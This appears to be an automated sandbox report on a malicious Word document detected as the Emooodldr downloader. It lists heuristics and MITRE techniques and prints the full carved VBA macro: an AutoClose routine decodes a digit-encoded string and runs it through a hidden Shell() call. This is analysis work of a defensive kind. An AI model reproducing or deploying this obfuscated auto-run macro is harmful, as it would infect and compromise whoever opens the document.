Verdict: MALICIOUS
Risk score: 244

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The file is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. Static analysis revealed VBA macros, including an Auto_Close macro and a call to the Shell() function. The script attempts to execute a deobfuscated string, likely a second-stage payload, which is characteristic of the Emooodldr family.
Heuristics (6):
- ClamAV: Doc.Malware.Emooodldr-6711604-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): document contains a VBA project; VBA macros present
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2436 bytes |

SHA-256: 8b9488b32dcc0c8ef025852e079d51e90ac55091d77bf04578e04f26db729337

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Lookup table: returns the character stored at index `positivo`.
' Each two-digit number in the encoded string selects one entry here.
Public Function coppia(positivo As Integer) As String
    Dim civile() As Variant
    civile = Array("s", ")", "T", "O", "?", "u", "X", "-", "h", "d", "$", "E", ",", "/", "W", "f", "o", "g", "m", "r", "A", "(", "l", "P", "+", "I", "b", "3", "V", "t", "j", ";", "F", "i", "N", "n", "D", "1", "'", "4", "a", " ", "x", "y", "=", "w", "8", "e", "p", "H", "v", "B", "\", "S", "C", ".", "c", ":", "2")
    Dim rischio As Integer
    For rischio = LBound(civile) To UBound(civile)
        If rischio = positivo Then
            coppia = civile(rischio)
        End If
    Next
End Function

' Splits a string into an array of single characters.
Function braccio(uragano As String)
    uragano = StrConv(uragano, vbUnicode)
    braccio = Split(Left(uragano, Len(uragano) - 1), vbNullChar)
End Function

' Decoder: walks the digit string two characters at a time, converts
' each pair to an integer and appends the matching lookup-table character.
Function supporto(stirpe As String) As String
    Dim inter As Integer
    Dim peggio As String
    Dim mensola As Variant
    mensola = braccio(Trim(stirpe))
    For rischio = 0 To Len(stirpe)
        If (rischio + 1) <= UBound(mensola) Then
            Dim volatile As String
            volatile = mensola(rischio)
            rischio = rischio + 1
            volatile = volatile + mensola(rischio)
            peggio = peggio + coppia(Int(volatile))
        End If
    Next
    supporto = peggio
End Function

' Executes the decoded string through Shell(); window style 0 (vbHide) keeps it invisible.
Public Function pavone(andrea As String)
    Shell andrea, 0
End Function

' Auto_Close trigger: fires when the document is closed, decodes the
' embedded digit string and hands the result to pavone() for execution.
Sub AutoClose()
    Call Application.Run("pavone", supporto("561809554742474113564148164547190008472222410711424756415143484000004107341623410754161818403509412134474507032630475629415343002947185534472955144726542233473529015536164535221640093233224721380829294857131340403509474717354047403543555616181335333516130005484719551809153812411047355057202323362002204124413852351843234728304955474247380131415329401929072319165647000041104735505720232336200220385235184323472830495547424738314121344745070326304756294153430029471855344729551447265422334735290155361645352216400953291933351721380829294857131340403509474717354047403543555616181300554808480433094400054847193801314125110621213447450703263047562941534300294718553447295514472654223347352901553616453522164009532919333517213808292948571313273755374639555827395537394613005548084838010131"))
End Sub
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes |

SHA-256: ea4523ee991c62bbbd842fe3d83b73fedaf3d5aceed5c0d28a56640838ce3f3f

Detection:
- ClamAV: Doc.Malware.Emooodldr-6711604-0
- Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob(s))